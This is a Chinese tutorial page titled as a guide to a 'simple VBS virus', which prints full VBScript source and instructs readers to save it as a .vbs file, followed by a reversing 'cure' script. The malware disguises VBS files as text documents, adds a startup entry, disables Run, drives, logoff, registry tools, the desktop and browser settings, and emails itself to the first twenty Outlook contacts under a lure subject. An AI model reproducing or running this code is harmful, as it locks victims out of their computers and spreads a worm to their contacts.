2025年3月18日 星期二 甲辰(龙)年 月十七 设为首页 加入收藏
rss
掌上城东
  • 进入网站首页面

    掌上城东书院
    定制您的专属资源库
  • m.cdsy.xyz

    掌上城东书院
    随时随地,想看就看
关注我们
内容服务
旗下网站

高级搜索
帮助
加入我们

首页

您当前的位置:首页 > 计算机 > 编程开发 > VB

攻略:简易VBS病毒

时间:03-25来源:作者:点击数:52

注意:这些病毒只是用来整蛊别人的,仅用于参考。

病毒全部代码

  • On Error Resume Next

  • Set fs=CreateObject(“Scripting.FileSystemObject”)

  • Set dir1=fs.GetSpecialFolder(0)

  • Set dir2=fs.GetSpecialFolder(1)

  • Set so=CreateObject(“Scripting.FileSystemObject”)

  • dim r

  • Set r=CreateObject(“Wscript.Shell”)

  • r.Regwrite “HKLM\Software\classes\vbsfile\defaulticon”,“shell32.dll,-152
  • r.Regwrite “HKLM\Software\classes\vbsfile”,“文本文档”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,63000000,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,1,“REG_DWORD”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry”,“”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode”,1,“REG_DWORD”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system”,“Win32system.vbs”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders”,1,“REG_DWORD”

  • r.Regwrite “HKLM\Software\CLASSES.reg”,“txtfile”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,“你好!”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,“你的电脑已经毁掉。请立即更新。”

  • Set ol=CreateObject(“Outlook.Application”)

  • On Error Resume Next

  • For x=1 To 20

  • Set Mail=ol.CreateItem(0)

  • Mail.to=ol.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x)

  • Mail.Subject=“你没事吧?”

  • Mail.Body=“我给你发了一个邮件,里面有妙方。”

  • Mail.Attachments.Add(dir2&“Win32system.vbs”)

  • Mail.Send

  • Next

  • ol.Quit

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock”,1,“REG_DWORD”

  • r.Regwrite “HKEY_USERS.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page”,“https://www.baidu.com/”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions”,1,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”,1,“REG_DWORD”

将它们复制为TXT,再修改扩展名为vbs

解毒程序

  • et fs=CreateObject(“Scripting.FileSystemObject”)

  • Set dir1=fs.GetSpecialFolder(0)

  • Set dir2=fs.GetSpecialFolder(1)

  • Set so=CreateObject(“Scripting.FileSystemObject”)

  • dim r

  • Set r=CreateObject(“Wscript.Shell”)

  • r.Regwrite “HKLM\Software\classes\vbsfile\defaulticon”,dir1&“\wscript.exe,2
  • r.Regwrite “HKLM\Software\classes\vbsfile”,“VBScript Script file”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,0,“REG_DWORD”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry”,“scanregw.exe /autorun”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode”,0,“REG_DWORD”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system”,“”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders”,0,“REG_DWORD”

  • r.Regwrite “HKLM\Software\CLASSES.reg”,“regfile”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,“”

  • r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,“”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock”,0,“REG_DWORD”

  • r.Regwrite “HKEY_USERS.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page”,“about:blank”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions”,0,“REG_DWORD”

  • r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”,0,“REG_DWORD”

  • 7

还是将它们复制为TXT,再修改扩展名为vbs

如果喜欢,欢迎一键三连。

方便获取更多学习、工作、生活信息请关注本站微信公众号城东书院 微信服务号城东书院 微信订阅号
3
来顶一下
返回首页
返回首页
上一篇:使用正则表达式清除Vb中的注释 下一篇:用VBS实现公司自动打卡
推荐内容
高考生入学注意:这些大学不收复读生
高考生入学注意:这些大		【健康】纯净水、天然水、矿泉水、白开水有什么区别?日常喝水怎么选?
【健康】纯净水、天然
14种竞赛生升学路径盘点,原来高考只是你的第15个选择!
14种竞赛生升学路径盘		excel后缀xls和xlsx有什么区别?转换格式难不难?
excel后缀xls和xlsx有
相关内容
栏目更新
栏目热门
关于我们 | 联系我们 | 用户协议 | 广告服务 | 申请链接 | 网站地图 | 版权声明 | 用户留言 | 招聘信息 | 帮助中心 | 社区讨论 | 下载服务
中国文明网传播文明
Copyright ©2019-2024 CDSY Corporation, All Rights Reserved
城东书院® CDSY.XYZ 版权所有 湘ICP备19021508号-1 公安网备案湘公网安备 43102202000103号
※学习、工作、生活信息平台※
世上学问皆小术,真正精深是道法。
本网大部分资源来源于会员上传,除本网组织的资源外,版权归原作者所有,如有侵犯版权,请立刻和本网联系并提供证据,本网将在三个工作日内改正。
美工素材
免费外链
一起解密
城东书院
美工之家